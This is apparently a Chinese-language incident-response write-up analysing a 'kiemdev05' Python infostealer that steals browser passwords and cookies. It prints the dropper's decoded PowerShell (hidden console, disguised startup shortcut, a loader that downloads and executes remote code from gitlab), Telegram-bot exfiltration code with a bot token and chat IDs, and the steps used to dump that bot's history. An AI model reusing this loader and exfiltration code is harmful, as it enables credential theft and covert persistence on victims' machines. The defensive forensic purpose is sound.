# 病毒 kiemdev05
## EDR Log
在看 edr log 時看到有抓到一隻程式 `synaptics.exe`
查看行為會發現它建立許多 chrome 的子程式,並且連線到許多 IP
並且偷取各種瀏覽器密碼 `C:\Users\admin\AppData\Local\Temp\[TW_某IP] 電腦名稱.zip`
1. 執行 python payload sup02.entrypoint
2. DNS resolved gitlab.com
3. 連線
4. 取得 chrome 資訊
5. 檔案建立 login_db, 電腦名稱, 電腦名稱\All_Passwords.txt
6. 檔案刪除 login_db, cards_db
7. taskkill chrome.exe
8. 執行 python 建立 chrome remote-debug
9. 修改 chrome registry key
10. edge ....
11. DNS resloved adsmanager.facebook.com, graph.facebook.com, mbasic.facebook.com, www.facebook.com
12. 連線
13. 檔案建立 Facebook_Cookies.txt
14. DNS resloved ip-api.com
15. 檔案建立 Temp\[TW_某IP] 電腦名稱.zip
16. 修改檔案 Temp\[TW_某IP] 電腦名稱.zip
17. DNS resloved api.telegram.org
18. 連線
19. 將所有產生的檔案刪除,如 txt/zip
這些操作都在執行後的兩分鐘內完成
```
由 sup02.entrypoint 執行建立的檔案,依照看到的建立時間往下排
C:\Users\admin\AppData\Local\Temp\login_db
C:\Users\admin\AppData\Local\Temp\電腦名稱\All_Passwords.txt
C:\Users\admin\AppData\Local\Temp\電腦名稱
C:\Users\admin\AppData\Local\Temp\電腦名稱\Cookies Browser
C:\Users\admin\AppData\Local\Temp\電腦名稱\Cookies Browser\Chrome_Profile 1.txt
C:\Users\admin\AppData\Local\Temp\電腦名稱\Cookies Browser\Chrome_Default.txt
C:\Users\admin\AppData\Local\Temp\cards_db
C:\Users\admin\AppData\Local\Temp\電腦名稱\Cookies Browser\Edge_Default.txt
C:\Users\admin\AppData\Local\Temp\PC-C002292\Facebook_Cookies.txt
C:\Users\admin\AppData\Local\Temp\[TW_某IP] 電腦名稱.zip
```
```
在 edr log 上看到從電腦連線出去的相關事件 IP
直接連線
172.65.251.78:443 gitlab.com
127.0.01:9222
31.13.87.1:443
31.13.87.36:443
208.95.112.1:80 ip-api.com
149.154.167.220:443 api.telegram.org
建立chrome 連線 127.0.0.1:9222 去瀏覽網站
142.250.198.78:80
142.250.204.35:443
142.250.196.196:443
74.125.204.84:443
142.250.204.42:443
142.250.204.46:443
142.250.77.10:443
142.250.198.78:443
142.250.66.68:443
142.250.198.74:443
142.250.157.188:5228
142.250.196.206:443
142.250.196.195:443
建立 edge 連線 127.0.0.1:9222 去瀏覽網站
13.107.42.16:443
204.79.197.203:443
13.107.21.239:443
203.69.81.97:443
203.69.81.152:443
20.255.46.225:443
204.79.197.237:443
203.69.81.155:443
204.79.197.203:443
61.220.62.226:443
203.74.95.35:443
210.71.227.123:443
3.169.137.63:443
52.231.230.148:443
104.116.18.28:443
20.42.73.26:443
20.24.121.134:443
104.116.16.155:443
40.104.20.2:443
```
往前找會找到 explorer.exe 執行 `"C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"` 這段指令
並且可以看到它是由 lnk 檔案執行,`C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk` 路徑在 startup 底下,會在開機時執行
## 連線電腦查看
實際連接到電腦上查看,`C:\Users\Public\ChromeApplication\synaptics.exe` 底下有
1. DLLs 資料夾
2. Lib 資料夾
3. definitions.py
4. python310.dll
5. synaptics.exe
6. vcruntime140.dll
Lib 底下為 python library
WindowsSecurity.lnk 的指令為 `"C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"`
而檢查 synaptics.exe 得知為 [pythonw.exe](https://www.virustotal.com/gui/file/ff507b25af4b3e43be7e351ec12b483fe46bdbc5656baae6ad0490c20b56e730),版本為 3.10.11
並有執行 [OMENScan/AChoirX: ReWrite of AChoir in Go for Cross Platform](https://github.com/OMENScan/AChoirX) 來獲取鑑識資料
## 其他資訊調查
查看 https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint
可以看到主程式經過混淆
```python
exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode("c%1Cm*|PH5ognzVzu}zY<71~YU3R9OlSzhTNU|hA48c4|3_=1lf}#u11PBcXNq`VTbcC~_>!u^R-XQZb-=d$OE-N~|H*h~fU$yo=$LTD0boUFaO~CpgmZUXn{kQz`M}Oah?^gJB|L6by`V#y&_`ttdpI=|zUW*s&^+zw^_t(qI|Mq_dr|_+AUz8X1MS1=0>tDY7*H>U*U|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|`_?r>Pg=m4C6md3||%sUMUNzkPjuS-kLXc|N|``uuxc!n2f5#z*1fd-_TE^qzheKEJ15317XZUkhKqr{4(Qyr(}Be)OJxD}4K&{#f|&d-|R5-Fx~I;V19uPlcbpr+*^+$$R=U;b&p`+4xiQ&xAjFeY^Kp#%J^A!q4CRwecU!UkJZ2e<}R({rfk@pPPRn{KdO}Wc<qfweahAe{1}u`B%bUnSU+(wfQ%~-@G6DvGKR&Z-n2x`#U3I{+;l5@BWDqHDf}|j0<ryAtcPd7yjN%3d#51erlx5w2(G4LdN_D;UB_df1+lUpQ+i+C*@C-Kl`Uo!apiMSN_94y$JtN`GxY!Fol#qSN<YQVdYoKufsH_{H5|&VVYMz|MSn4zy6n3p`iSY^0(m;M9nL|Q47EQAQV+ZExxt2@`-*)MSl1C^78V#@ckluw6>?;eF#OSUcdaQ?5LuruH=Jdsj{aXtnlEEq+&r)<%6Q8K79G)?nL;@k8Md;Ho4W#6y-3-..................
```
觀察 gitlab project 頁面,可以看到還有一隻 zk.entrypoint
並且此使用者只建立此 project
使用 `kiemdev05` 搜尋,可以找到
1. [X 上的 StrikeReady Labs:「One of our favorite hunts is flagging on language-specific content. Although non-english attacks are not rare, when you combine with prevalence, it can be be a good thread. This susp VN actor is targeting in Romanian. Zip drops a pass protected rar, pass is "kiemdev05" https://t.co/aCaNNnHj9s」 / X](https://x.com/StrikeReadyLabs/status/1868745455569351087)
這篇貼文寫說此 ID 的使用者可能來自越南
3. [Find method to Decompile .NET Core Single File - Exetools](https://forum.exetools.com/showthread.php?p=131221)
這篇貼文的發文者使用相同 ID,在越南
使用 ["blackhat_code/software" - Google 搜尋](https://www.google.com/search?q=%22blackhat_code%2Fsoftware%22),可以找到 [Automated Malware Analysis - Joe Sandbox Cloud Basic](https://www.joesandbox.com/analysis/1583800)
在 IoC 頁面中可以找到 `WindowsSecurity.lnk`,是由 powershell 建立,大概可以確定此病毒是同一隻
查看是如何開始的,可以看到由 [Lakatos, K#U00f6ves and Partners.bat](https://www.virustotal.com/gui/file/a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830) 開始執行
`C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Lakatos, K#U00f6ves and Partners.bat" "`
Lakatos, K#U00f6ves and Partners.bat 的內容如下
```
powershell -ep by"pa"ss -w hi"dd"en -enc ZgB1AG4AYwB0AGkAbwBuACAASABpAGQAZQAtAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApACAAewANAAoAI"AAgACAAIAAkAFMAaABvAHcAVwBpAG"4AZABvAHcAQQBzAHkAbgBjAEMAbwBkAGUAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjACgASQBuAHQAUAB0AHIAIABoAFcAbgBkACwAIABpAG4AdAAgAG4AQwBtAGQAUwBoAG8AdwApADsAJwANAAoAIAAgACAAIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0ATQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAQwBvAGQAZQAgAC0AbgBhAG0AZQAgAFcAaQBuADMAMgBTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAFAAYQBzAHMAVABoAHIAdQANAAoAIAAgAA0ACgAgACAAIAAgACQAaAB3AG4AZAAgAD0AIAAoAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACkALgBNAGEAaQBuAFcAaQBuAGQAbwB3AEgAYQBuAGQAbABlAA0ACgAgACAAIA"AgAGkAZgAgACgAJABoAHcA"bgBkACAALQBuAGUAIABbAFMAeQBzAHQAZQBtAC4ASQBuAHQAUAB0AHIAXQA6ADoAWgBlAHIAbwApACAAewANAAoAIAAgACAAIAAgACAAJABTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwA6ADoAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAKAAkAGgAdwBuAGQALAAgADAAKQANAAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsADQAKACAAIAANAAoAIAAgACAAIAAgACAAJABVAG4AaQBxAHUAZQBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAA9ACAATgBlAHcALQBHAHUAaQBkAA0ACgAgACAAIAAgACAAIAAkAEgAbwBzAHQALgBVAEkALgBSAGEAdwBVAEkALgBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAA9ACAAJABVAG4AaQBxAHUAZQBXAGkAbgBkAG8AdwBUAGkAdABsAGUADQAKACAAIAAgACAAIAAgACQAUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgADEAMAAyADQADQAKACAAIAAgACAAIAAgACQAVABlAHIAbQBpAG4AYQBsAFAAcgBvAGMAZQBzAHMAIAA9ACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4ATQBhAGkAbgBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAAtAGUAcQAgACQAVQBuAGkAcQB1AGUAVwBpAG4AZABvAHcAVABpAHQAbABlACAAfQApAA0ACgAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACQAaAB3AG4AZAAg"AD0AIAAkAFQAZQByAG0A"aQBuAGEAbABQAHIAbwBjAGUAcwBzAC4ATQBhAGkAbgBXAGkAbgBkAG8AdwBIAGEAbgBkAGwAZQANAAoAIAAgACAAIAAgACAAaQBmACAAKAAkAGgAdwBuAGQAIAAtAG4AZQAgAFsAUwB5AHMAdABlAG0ALgBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACkAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwA6ADoAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAKAAkAGgAdwBuAGQALAAgADAAKQANAAoAIAAgACAAIAAgACAAfQAgAGUAbABzAGUAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIARgBhAGkAbABlAGQAIAB0AG8AIABoAGkAZABlACAAdABoAGUAIABjAG8AbgBzAG8AbABlACAAdwBpAG4AZABvAHcALgAiAA0ACgAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAB9AA0ACgBIAGkAZABlAC0AQwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwANAAoAJABkAHMAdAAgAD0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAQwBoAHIAbwBtAGUAQQBwAHAAbABpAGMAYQB0AGkAbwBuACcAOwAgAEEAZABkAC0AVAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEYAaQBsAGUAUwB5AHMAdABlAG0AOwAgAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGQAcwB0ACkAIAB7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAiACQAZABzAHQAXAAqACIAIAB9ACAAZQBsAHMAZQAgAHsAIABOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBGAG8AcgBjAGUAIAAkAGQAcwB0ACAAfQANAAoARABvAGMAdQBtAGUAbgB0AF8AUwBlAGMAdQByAGUAXAByAGEAcgAuAGUAeABlACAAeAAgAEQAbwBjAHUAbQBlAG4AdABfAFMAZQBjAHUAcgBlAFwAcwBlAGMAdQByAGUAZABvAGMALgByAGEAcgAgACIAQ"wA6AFwAVQBzAGUAcgBz"AFwAUAB1AGIAbABpAGMAXABDAGgAcgBvAG0AZQBBAHAAcABsAGkAYwBhAHQAaQBvAG4AXAAiACAALQBwACIAawBpAGUAbQBkAGUAdgAwADUAIgANAAoADQAKACQAcwAgAD0AIAAkAHAAYQB5AGwAbwBhAGQAIAA9ACAAIgBpAG0AcABvAHIAdAAgAHIAZQBxAHUAZQBzAHQAcwA7AGUAeABlAGMAKAByAGUAcQB1AGUAcwB0AHMALgBnAGUAdAAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGwAYQBiAC4AYwBvAG0ALwBiAGwAYQBjAGsAaABhAHQAXwBjAG8AZABlAC8AcwBvAGYAdAB3AGEAcgBlAC8ALQAvAHIAYQB3AC8AbQBhAGkAbgAvAHMAdQBwADAAMgAuAGUAbgB0AHIAeQBwAG8AaQBuAHQAJwAsACAAdgBlAHIAaQBmAHkAPQBGAGEAbABzAGUAKQAuAHQAZQB4AHQAKQAiADsAJABvAGIAagAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDAG8AbQBPAGIAagBlAGMAdAAgAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAOwAkAGwAaQBuAGsAIAA9ACAAJABvAGIAagAuAEMAcgBlAGEAdABlAFMAaABvAHIAdABjAHUAdAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHQAYQByAHQAIABNAGUAbgB1AFwAUAByAG8AZwByAGEAbQBzAFwAUwB0AGEAcgB0AHUAcABcAFcAaQBuAGQAbwB3AHMAUwBlAGMAdQByAGkAdAB5AC4AbABuAGsAIgApADsAJABsAGkAbgBrAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlACAAPQAgADcAOwAkAGwAaQBuAGsALgBUAGEAcgBnAGUAdABQAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABDAGgAcgBvAG0AZQBBAHAAcABsAGkAYwBhAHQAaQBvAG4AXABzAHkAbgBhAHAAdABpAGMAcwAuAGUAeABlACIAOwAkAGwAaQBuAGsALgBJAGMAbwBuAEwAbwBjAGEAdABpAG8AbgAgAD0AIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAIAAoAHgAOAA2ACkAXABNAGkAYwByAG8AcwBvAGYAdABcAEUAZABnAGUAXABBAHAAcABsAGkAYwBhAHQAaQBvAG4AXABtAHMAZQBkAGcAZQAuAGUAeABlACwAMQAzACIAOwAkAGwAaQBuAGsALgBBAHIAZwB1AG0AZQBuAHQAcwAgAD0AIAAiAC0AYwAgAGAAIgAkAHAAYQB5AGwAbwBhAGQAYAAiACIAOwAkAGwAaQBuAGsALgBTAGEAdgBlACgAKQANAAoAYwBtAGQAIAAvAEMAIABzAHQAYQByAHQAIAAiACIAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAQwBoAHIAbwBtAGUAQQBwAHAAbABpAGMAYQB0AGkAbwBuAFwAcwB5AG4AYQBwAHQAaQBjAHMALgBlAHgAZQAiACAALQBjACAAYAAiACQAcABhAHkAbABvAGEAZABgACIA
```
將其進行 base64 decode 後得到
```
function Hide-ConsoleWindow() {
$ShowWindowAsyncCode = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
$ShowWindowAsync = Add-Type -MemberDefinition $ShowWindowAsyncCode -name Win32ShowWindowAsync -namespace Win32Functions -PassThru
$hwnd = (Get-Process -PID $pid).MainWindowHandle
if ($hwnd -ne [System.IntPtr]::Zero) {
$ShowWindowAsync::ShowWindowAsync($hwnd, 0)
} else {
$UniqueWindowTitle = New-Guid
$Host.UI.RawUI.WindowTitle = $UniqueWindowTitle
$StringBuilder = New-Object System.Text.StringBuilder 1024
$TerminalProcess = (Get-Process | Where-Object { $_.MainWindowTitle -eq $UniqueWindowTitle })
$hwnd = $TerminalProcess.MainWindowHandle
if ($hwnd -ne [System.IntPtr]::Zero) {
$ShowWindowAsync::ShowWindowAsync($hwnd, 0)
} else {
Write-Host "Failed to hide the console window."
}
}
}
Hide-ConsoleWindow
$dst = 'C:\Users\Public\ChromeApplication'; Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst }
Document_Secure\rar.exe x Document_Secure\securedoc.rar "C:\Users\Public\ChromeApplication\" -p"kiemdev05"
$s = $payload = "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "C:\Users\Public\ChromeApplication\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save()
cmd /C start "" "C:\Users\Public\ChromeApplication\synaptics.exe" -c `"$payload`"
```
可以看到這段腳本,建立 C:\Users\Public\ChromeApplication 並將 Document_Secure\securedoc.rar 放入
```
$dst = 'C:\Users\Public\ChromeApplication';
Add-Type -AssemblyName System.IO.Compression.FileSystem;
if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst }
Document_Secure\rar.exe x Document_Secure\securedoc.rar "C:\Users\Public\ChromeApplication\" -p"kiemdev05"
```
建立 WindowsSecurity.lnk,並將 payload 放入後執行。
查看防火牆 log,確實在建立之後有進行 tg bot 連線
```
$s = $payload = "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)";
$obj = New-Object -ComObject WScript.Shell;
$link = $obj.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk");
$link.WindowStyle = 7;
$link.TargetPath = "C:\Users\Public\ChromeApplication\synaptics.exe";
$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";
$link.Arguments = "-c `"$payload`"";
$link.Save()
cmd /C start "" "C:\Users\Public\ChromeApplication\synaptics.exe" -c `"$payload`"
```
### 完整事件流程圖
## 鑑識調查
從上面跟下面大概可以知道整個病毒的運作流程,我想找出幾個資訊
1. 寄送的 telegram 帳號
2. 是否有 loader(更早的病毒) 將這些檔案載入
3. powershell payload 是如何執行的
4. 攻擊者是誰
5. 能否回復 password.zip
6. 能否找到 Document_Secure\securedoc.rar
7. bat 是如何進入並執行的
從電腦查看可以看到 WindowsSecurity.lnk 的建立時間,時間為兩週前建立
且由於已經重啟過,所以無法查看更早的紀錄
[渗透技巧——Windows下NTFS文件的USN Journal](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E4%B8%8BNTFS%E6%96%87%E4%BB%B6%E7%9A%84USN-Journal)
想要查看文件的修改紀錄,可以參考這篇文章,查看 USN Journal
看看能否解析 `$LogFile` 跟 `$MFT` 檔案
### LogFile
[jschicht/LogFileParser: Parser for \$LogFile on NTFS](https://github.com/jschicht/LogFileParser) 可以提取各項內容存成 csv 檔案查看
[Free Version](https://www.forensafe.com/free.html) 可以把 evtx 全部匯入一起查看,但是好像無法查看 \$LogFile 內容
### MFT
[kacos2000/MFT_Record_Viewer: \$MFT Record Viewer](https://github.com/kacos2000/MFT_Record_Viewer)
[Master File Table and Computer Forensics](https://www.asdfed.com/Master-File-Table-and-Computer-Forensics)
[Windows Master File Table (MFT) in Digital Forensics — MCSI Library](https://library.mosse-institute.com/articles/2022/05/windows-master-file-table-mft-in-digital-forensics/windows-master-file-table-mft-in-digital-forensics.html)
### LastActivity.csv
這份文件有紀錄相當完整的時間軸操作
可以看到開關機時間與休眠時間,確實是有在該時間點重開機
### EVTX
[Download LogViewPlus](https://www.logviewplus.com/download.html) 比較好用,可以把所有檔案合併起來查看
[NVISOsecurity/evtx-hunter: evtx-hunter helps to quickly spot interesting security-related activity in Windows Event Viewer (EVTX) files.](https://github.com/NVISOsecurity/evtx-hunter/tree/main) 可以用來查看統計資料
在 Windows PowerShell 中看到上面提到的 powershell payload 執行紀錄,同個時間為 WindowsSecurity.lnk 建立時間
```
"Registry" 提供者為 Started。
詳細資料:
ProviderName=Registry
NewProviderState=Started
SequenceNumber=1
HostName=ConsoleHost
HostVersion=5.1.19041.5247
HostId=1f132efa-416b-4ce6-b7cf-b48accaa8911
HostApplication=powershell -ep bypass -w hidden -enc ZgB1AG4AYwB0....
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
```
到這邊就找不下去了,沒有 file operation log,並且有重開機導致資料不完整。
無法找到 .bat 檔案的建立與執行,以及 Document_Secure\securedoc.rar 跟 cmdline,最早只能追溯到 powershell payload 執行
可能還有更前面的執行檔會進行載入
## 記憶體分析
因使用正常的 python 函式庫,並且會將產生檔案刪除,導致無法透過記憶體分析尋找相關資訊
## sup02.entrypoint 分析
詳細內容請看 [kiemdev05 sup02.entrypoint 分析](/m9A7Dg2eRjSIGOOKz4RiLg)
可以看到裡面有 `statut='Không Rõ Trạng Thái'`
這是越南文,表示 狀態未知,可以更確定是越南人所寫
另外一隻 zk_entrypoint 雖然沒有出現,但也分析完了,詳情 [kiemdev05 zk.entrypoint](/LoyT_kubTaiiOxijd9Biug)
### telegram api
在 source code 可以看到會將偷取到的檔案使用 tg bot 傳送出去
```python=
TOKEN_BOT='7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI'
CHAT_ID_NEW='-1002426006531'
CHAT_ID_RESET='-1002489276039'
with open(archive_path,'rb') as f:
response=requests.post(
f"https://api.telegram.org/bot{TOKEN_BOT}/sendDocument",
params={'chat_id':CHAT_ID, 'caption':message_body, 'protect_content':True, 'disable_web_page_preview':True},
files={'document':f},
)
response.raise_for_status()
```
查看是否有資訊可以從 api 中取得
這是查看此頻道訊息的 api https://api.telegram.org/bot{token}/getUpdates
嘗試從 tg bot api 收集資訊
1. [Telegram Bot API](https://core.telegram.org/bots/api#available-methods) 相關 method
2. [GitHub - soxoj/telegram-bot-dumper: 🔪 Dumper & ripper for Telegram bots by token](https://github.com/soxoj/telegram-bot-dumper?tab=readme-ov-file) 此工具可以直接將資訊提取並監聽
```
ID: 7688244721
Name: data ve ne
Username: @data_015_bot - https://t.me/data_015_bot
Dumping history from 200 to 0...
Empty messages x4
[5][830655559][2024-12-21 15:41:19+00:00] /start
====================
NEW USER DETECTED: 830655559
First name: None
Last name: None
User has no username
Empty messages x6
[8][6893446818][2024-12-21 18:44:24+00:00] /start
====================
NEW USER DETECTED: 6893446818
First name: supremeo
Last name: rodriguo
Username: @rodriguotavone585353853 - https://t.me/rodriguotavone585353853
Empty messages x8
[11][7063152197][2024-12-24 01:44:39+00:00] /start
====================
NEW USER DETECTED: 7063152197
First name: C0NJURER
Last name: None
Username: @C0NJURERR - https://t.me/C0NJURERR
Saving photo 4902486628019318169...
Empty messages x8
[12][1079398712][2025-01-04 15:57:40+00:00] MessageActionChatAddUser(users=[7688244721])
Empty messages x8
[13][1079398712][2025-01-04 15:58:38+00:00] MessageActionChatMigrateTo(channel_id=2271537412)
Empty messages x8
[14][1079398712][2025-01-04 15:59:17+00:00] MessageActionChatCreate(title='Data_Reset', users=[1079398712, 7688244721])
Empty messages x8
[15][1079398712][2025-01-04 15:59:17+00:00] MessageActionSetMessagesTTL(period=2678400)
Empty messages x8
[16][1079398712][2025-01-04 16:00:07+00:00] MessageActionChatMigrateTo(channel_id=2399198378)
Empty messages x191
Saving history of 830655559 as a text...
Saving history of 6893446818 as a text...
Saving history of 7063152197 as a text...
Saving history of 4761447413 as a text...
Saving history of 4615328488 as a text...
History was fully dumped.
Press Ctrl+C to stop listeting for new messages...
```
/getchatadministrators
```
{
"ok": true,
"result": [
{
"user": {
"id": 7688244721,
"is_bot": true,
"first_name": "data ve ne",
"username": "data_015_bot"
},
"status": "administrator",
"can_be_edited": false,
"can_manage_chat": true,
"can_change_info": false,
"can_delete_messages": false,
"can_invite_users": false,
"can_restrict_members": false,
"can_pin_messages": false,
"can_manage_topics": false,
"can_promote_members": false,
"can_manage_video_chats": false,
"can_post_stories": false,
"can_edit_stories": false,
"can_delete_stories": false,
"is_anonymous": false,
"can_manage_voice_chats": false
},
{
"user": {
"id": 1079398712,
"is_bot": false,
"first_name": ".",
"username": "senju822222"
},
"status": "creator",
"is_anonymous": false
}
]
}
```
可以參考這篇文章 [How We Were Able to Infiltrate Attacker Telegram Bots](https://checkmarx.com/blog/how-we-were-able-to-infiltrate-attacker-telegram-bots/)
## process tree
除了在電腦上看到的痕跡,此 sandbox 還有紀錄其他的程式
1. csc.exe
2. cvtres.exe
### csc.exe
[C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe](https://www.virustotal.com/gui/file/4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7)
[Csc | LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/Csc/) 寫說此程式是 .NET Framework 用於編譯 C# 程式碼的二進位文件
`"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aflg023p\aflg023p.cmdline"`
aflg023p.cmdline 應該是一個 c# 程式碼文件
### cvtres.exe
[C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe](https://www.virustotal.com/gui/file/1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6)
它將 `.res` 資源檔案轉換為通用物件檔案格式([COFF](https://en.wikipedia.org/wiki/COFF))`.obj` 物件文件,連結器可以將其連結到完成的`.exe` PE 應用程式檔案中。
用於將資源檔案 (.res) 轉換為可以使用連結器連結的編譯物件。
`C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1DB.tmp" "c:\Users\user\AppData\Local\Temp\aflg023p\CSCBA3711F82A4D46E8AC7D47C2390FF68.TMP"`
這些工具是進行 `Living Off the Land Binaries And Scripts` 的常用工具,詳細攻擊手法可以參考這篇文章 [New Tool to Add to Your LOLBAS List: cvtres.exe - SANS Internet Storm Center](https://isc.sans.edu/diary/27892)
### aflg023p.cmdline
```
./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\aflg023p\aflg023p.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\aflg023p\aflg023p.0.cs"
```
### Lakatos, K#U00f6ves and Partners.bat
[MalwareBazaar | Download malware samples](https://bazaar.abuse.ch/download/a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830/)
可以看到與上面所看到的內容相同
